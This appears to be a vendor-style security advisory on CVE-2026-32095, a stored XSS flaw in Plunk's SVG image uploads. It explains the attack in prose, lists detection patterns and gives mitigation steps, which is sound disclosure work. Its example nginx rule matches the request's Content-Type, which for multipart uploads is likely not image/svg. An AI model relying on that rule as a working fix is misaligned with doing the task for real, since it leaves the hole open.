CVE-2026-32095 Overview
CVE-2026-32095 is a stored Cross-Site Scripting (XSS) vulnerability in Plunk, an open-source email platform built on top of AWS SES. Prior to version 0.7.1, Plunk's image upload endpoint accepted SVG files without proper sanitization. Since browsers treat SVG files as active documents capable of executing embedded JavaScript, attackers could upload malicious SVG files containing JavaScript payloads that would execute in the context of other users' sessions.
Critical Impact
Attackers can upload malicious SVG files to execute arbitrary JavaScript in victims' browsers, potentially stealing session tokens, performing actions on behalf of users, or compromising sensitive email platform data.
Affected Products
- Plunk versions prior to 0.7.1
- Open-source deployments using the vulnerable image upload endpoint
- Self-hosted Plunk instances with unrestricted SVG file uploads
Discovery Timeline
- 2026-03-11 - CVE CVE-2026-32095 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-32095
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) occurs due to insufficient validation of uploaded file types in the image upload functionality. The vulnerability allows authenticated users to upload SVG files through the image upload endpoint. SVG (Scalable Vector Graphics) files are XML-based and can contain embedded <script> tags or event handlers that execute JavaScript when the file is rendered in a browser.
When a malicious SVG is uploaded and subsequently viewed by other users (such as in email previews or user avatars), the embedded JavaScript executes within the security context of the Plunk application. This allows attackers to perform actions such as stealing authentication cookies, modifying page content, or redirecting users to malicious sites.
The vulnerability requires low privileges (authenticated user) and user interaction (victim must view the malicious content), with potential impact across different user sessions due to its stored nature.
Root Cause
The root cause is improper input validation in the file upload handler. The application failed to restrict or sanitize SVG file uploads, treating them as safe image files despite their capability to contain executable content. Proper mitigation requires either blocking SVG uploads entirely or implementing robust Content Security Policy (CSP) headers and sanitizing SVG content to remove scripting capabilities.
Attack Vector
The attack is network-based and requires an authenticated attacker to upload a specially crafted SVG file through the image upload endpoint. The malicious file is stored on the server and served to other users who view the content, triggering the XSS payload in their browsers. This creates a persistent attack vector that can affect multiple victims without further attacker interaction.
The vulnerability mechanism involves crafting an SVG file with embedded JavaScript, typically using <script> elements or inline event handlers like onload or onerror. When the platform serves this SVG to users, the browser parses and executes the embedded script. For technical details, refer to the GitHub Security Advisory.
Detection Methods for CVE-2026-32095
Indicators of Compromise
- Presence of SVG files in upload directories containing <script> tags or JavaScript event handlers
- Unusual JavaScript execution originating from SVG file requests in browser console logs
- User reports of unexpected browser behavior when viewing uploaded images
- HTTP access logs showing repeated requests to uploaded SVG files from multiple user sessions
Detection Strategies
- Implement file content inspection rules to detect SVG files containing <script>, javascript:, or event handler attributes
- Deploy web application firewall (WAF) rules to block SVG uploads or inspect their content for malicious patterns
- Monitor server logs for uploads with .svg extensions or image/svg+xml content types
- Utilize SentinelOne Singularity XDR to detect and alert on anomalous script execution patterns originating from file upload contexts
Monitoring Recommendations
- Enable detailed logging on file upload endpoints to capture file types, sizes, and content hashes
- Configure browser-side Content Security Policy violation reporting to detect XSS attempts
- Set up alerting for any SVG file uploads to the image endpoint pending security review
- Monitor for session anomalies that may indicate session hijacking following XSS exploitation
How to Mitigate CVE-2026-32095
Immediate Actions Required
- Upgrade Plunk to version 0.7.1 or later immediately
- Audit existing uploaded files for malicious SVG content and remove any containing JavaScript
- Implement strict Content Security Policy headers to prevent inline script execution
- Consider temporarily disabling SVG uploads until the patch is applied
Patch Information
This vulnerability is fixed in Plunk version 0.7.1. Organizations should update to this version or later to remediate the stored XSS vulnerability. The fix addresses the file upload validation to properly handle SVG files. For detailed patch information, see the GitHub Security Advisory.
Workarounds
- Block SVG file uploads at the web server or reverse proxy level by filtering requests with image/svg+xml content type
- Implement server-side SVG sanitization to strip script elements and event handlers before storing uploaded files
- Configure Content-Disposition headers to force download rather than inline rendering of SVG files
- Deploy a Content Security Policy with script-src directives that prevent inline JavaScript execution
# Example nginx configuration to block SVG uploads
location /api/upload {
# Block SVG file uploads
if ($http_content_type ~* "image/svg") {
return 403;
}
# Add CSP header to prevent inline script execution
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';" always;
proxy_pass http://plunk_backend;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
